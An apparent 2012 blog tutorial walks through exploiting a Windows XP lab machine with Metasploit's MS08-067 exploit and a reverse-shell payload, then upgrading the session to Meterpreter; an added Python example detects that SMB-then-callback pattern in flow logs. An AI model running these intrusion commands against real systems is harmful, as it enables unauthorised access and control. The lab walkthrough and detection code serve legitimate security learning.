Tuesday, May 1, 2012

Metasploit ~ Upgrade Command Shell into Meterpreter

As I said in my post about Meterpreter, it is an advanced payload that can do a lot of advanced tasks after a system is exploited. But what if we can only get a normal command shell after exploitation? Doing the post-exploitation step is then rather difficult, of course. That doesn't matter now, because one of the newer features in the Metasploit Framework is its ability to upgrade a command shell payload to a Meterpreter shell payload once the system has been exploited. This can be done by issuing "sessions -u <selected session>". This is useful if we use a command shell payload as an initial stager and then find that this newly exploited system would make the perfect launching pad for further attacks.

OK, let's get started. I'll use the Metasploit console, and the system that will be exploited is a Windows XP SP3 machine in my VirtualBox.

- Start your Metasploit console
# msfconsole

- Turn on the Windows XP machine
- As in my earlier post, I'll use the ms08_067_netapi exploit, because an unpatched Windows XP system is very vulnerable to this exploit.
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/shell_reverse_tcp
msf  exploit(ms08_067_netapi) > set RHOST 192.168.56.2
msf  exploit(ms08_067_netapi) > set LHOST 192.168.56.1

- Run the exploit
msf  exploit(ms08_067_netapi) > exploit -z
With the "-z" parameter added, the opened session runs in the background.

- Let's see the opened session.

- Now let's upgrade this command shell into a Meterpreter shell. Simply execute this command
msf  exploit(ms08_067_netapi) > sessions -u 1
- Wait until the command stager progress reaches 100%

- And there you are, a new Meterpreter session is opened.

- To interact with it, just execute this command
msf  exploit(ms08_067_netapi) > sessions -i 2

OK, that's it.
Again, this shows us how powerful and convenient the Metasploit Framework is for a pentester.

"the quieter you become, the more you are able to hear.."
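
Seen from the network side, the sequence above leaves a recognisable pattern: an SMB connection into the host, followed by two connections from that host back to the same peer (the command shell, then the upgraded session). The Python below is an added example, not part of the original post; the flow-record layout, the name `find_callback_chains` and the thresholds are assumptions, and it assumes the upgraded session also connects back to LHOST.

```python
from collections import namedtuple

# One TCP connection start from a flow log: epoch seconds, initiator, responder, responder port.
Flow = namedtuple("Flow", "ts src dst dport")

SMB_PORT = 445  # MS08-067 is reached through the Server service over SMB


def find_callback_chains(flows, window=600, min_callbacks=2):
    """Return hosts that accepted SMB from a peer and then dialled back to it.

    One callback matches a reverse shell; a second one to the same peer is
    what the shell-to-Meterpreter upgrade adds (assumed to be reverse TCP).
    """
    flows = sorted(flows, key=lambda f: f.ts)
    findings = []
    seen = set()
    for smb in flows:
        pair = (smb.dst, smb.src)  # (host that was connected to, peer)
        if smb.dport != SMB_PORT or pair in seen:
            continue
        callbacks = [
            f for f in flows
            if f.src == smb.dst and f.dst == smb.src
            and f.dport != SMB_PORT
            and smb.ts <= f.ts <= smb.ts + window
        ]
        if len(callbacks) >= min_callbacks:
            seen.add(pair)
            findings.append({
                "host": smb.dst,
                "peer": smb.src,
                "smb_ts": smb.ts,
                "callback_ports": [f.dport for f in callbacks],
            })
    return findings


# Constructed sample flows; addresses follow the lab in the post, ports and times are made up.
SAMPLE_FLOWS = [
    Flow(1000, "192.168.56.1", "192.168.56.2", 445),    # inbound SMB to the XP guest
    Flow(1003, "192.168.56.2", "192.168.56.1", 4444),   # first callback (command shell)
    Flow(1090, "192.168.56.2", "192.168.56.1", 4433),   # second callback (upgraded session)
    Flow(2000, "192.168.56.7", "192.168.56.9", 445),    # ordinary file-share access, no callback
    Flow(2500, "192.168.56.9", "192.168.56.8", 443),    # outbound with no preceding SMB
    Flow(3000, "192.168.56.5", "192.168.56.6", 445),    # SMB followed by a single callback
    Flow(3002, "192.168.56.6", "192.168.56.5", 8080),
]

if __name__ == "__main__":
    for hit in find_callback_chains(SAMPLE_FLOWS):
        print(hit)
```

Lowering `min_callbacks` to 1 also reports hosts that made only a single callback after SMB, at the cost of more noise on networks where servers legitimately connect back to their clients.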

6 comments:

Alone said...

Nice Work. Keep it up,

Actually this video is also good. I mean I learned lots of things about Meterpreter. Maybe you'll like it :)

http://www.securitytube.net/video/2637
HaPPY Hacking

beats by dre cheap said...

Nice Work. Keep it up,

Actually this video is also good. I mean I learned lots of things about Meterpreter.

dragon_master said...

Thanks for coming, and thanks also for the video links.. :)

sarah lee said...

It is a very exciting blog post and picture, thanks for the post.

interesting Security systems

dragon_master said...

> sarah lee : thanks for coming.. :-)

Unknown said...

Hello, I personally got a huge problem. Well, I was getting comfortable with Meterpreter and I did sessions -u and I got a Meterpreter session, but now it's not working, it's just doing nothing. Any suggestions?
